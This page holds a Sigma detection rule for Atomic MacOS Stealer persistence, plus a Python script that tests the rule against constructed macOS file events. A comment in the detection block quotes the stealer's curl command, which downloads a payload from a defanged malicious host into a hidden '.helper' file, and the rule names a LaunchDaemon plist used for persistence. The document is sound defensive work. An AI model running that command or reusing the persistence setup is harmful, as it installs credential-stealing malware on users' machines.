Atomic MacOS Stealer - Persistence Indicators
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
Sigma rule
title: Atomic MacOS Stealer - Persistence Indicators
id: e710a880-1f18-4417-b6a0-b5afdf7e3023
status: experimental
description: |
    Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
references:
    - https://moonlock.com/amos-backdoor-persistent-access
    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44
author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
date: 2025-11-22
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.defense-evasion
    - attack.t1564.001
    - attack.t1543.004
    - detection.emerging-threats
logsource:
    category: file_event
    product: macos
detection:
    selection_user_helper:
        # sh -c curl -o '/Users/<username>/.helper' hxxps://halesmp[.]com/zxc/app
        Image|endswith: '/curl'
        TargetFilename|startswith: '/Users/'
        TargetFilename|endswith: '.helper'
    selection_launchdaemon:
        TargetFilename: '/Library/LaunchDaemons/com.finder.helper.plist'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high
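To show what the two selections actually match, here is an added example (not part of the rule page and not the Sigma project's own code) that evaluates the rule's detection block over constructed macOS file_event records. It implements a small subset of Sigma field-modifier semantics (exact match, startswith, endswith, contains, list-as-OR) and the "1 of selection_*" condition, so it generalises slightly beyond this one rule. Field names (Image, TargetFilename) follow the rule; the sample events and the username in them are constructed.

```python
from typing import Any

# Detection block transcribed from the rule above. Sigma modifiers stay in the
# key as 'Field|modifier', exactly as the rule writes them.
DETECTION = {
    "selection_user_helper": {
        "Image|endswith": "/curl",
        "TargetFilename|startswith": "/Users/",
        "TargetFilename|endswith": ".helper",
    },
    "selection_launchdaemon": {
        "TargetFilename": "/Library/LaunchDaemons/com.finder.helper.plist",
    },
}


def field_matches(event: dict, key: str, expected: Any) -> bool:
    """Apply one Sigma field test: exact match, |startswith, |endswith or |contains.
    A list of expected values is an OR, as in Sigma. A missing field never matches."""
    field, _, modifier = key.partition("|")
    actual = event.get(field)
    if actual is None:
        return False
    values = expected if isinstance(expected, list) else [expected]
    for value in values:
        if modifier == "" and actual == value:
            return True
        if modifier == "startswith" and actual.startswith(value):
            return True
        if modifier == "endswith" and actual.endswith(value):
            return True
        if modifier == "contains" and value in actual:
            return True
    return False


def selection_matches(event: dict, selection: dict) -> bool:
    """All field tests inside one selection block are ANDed together."""
    return all(field_matches(event, k, v) for k, v in selection.items())


def matched_selections(event: dict) -> list[str]:
    """Names of every selection_* block the event satisfies."""
    return [name for name, sel in DETECTION.items()
            if name.startswith("selection_") and selection_matches(event, sel)]


def rule_fires(event: dict) -> bool:
    """'1 of selection_*': the rule fires when at least one selection matches."""
    return len(matched_selections(event)) >= 1


# Constructed file_event records, not real telemetry. The paths mirror the
# rule's indicators; 'jdoe' is a placeholder username.
SAMPLE_EVENTS = [
    {"Image": "/usr/bin/curl", "TargetFilename": "/Users/jdoe/.helper"},
    {"Image": "/bin/cp", "TargetFilename": "/Library/LaunchDaemons/com.finder.helper.plist"},
    {"Image": "/usr/bin/curl", "TargetFilename": "/Users/jdoe/Downloads/report.pdf"},  # ordinary download
    {"Image": "/usr/bin/curl", "TargetFilename": "/tmp/.helper"},  # outside /Users/, not in scope
    {"Image": "/usr/local/bin/python3", "TargetFilename": "/Users/jdoe/.helper"},  # same file, not curl
]


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (event index, matched selections) for every event that fires the rule."""
    return [(i, matched_selections(e)) for i, e in enumerate(events) if rule_fires(e)]


if __name__ == "__main__":
    for i, sels in scan(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['TargetFilename']} -> {', '.join(sels)}")
```

Running the scan fires on events 0 and 1 only. Two tuning points fall out of the walkthrough: selection_user_helper keys on curl as the writing process, so the same `.helper` file created by any other process (event 4) is caught only if the LaunchDaemon plist is later observed; and `TargetFilename|endswith: '.helper'` matches any path under /Users/ ending in that suffix, not just a dotfile in the home directory, which is where the "Unknown" false-positive entry should be refined from local telemetry.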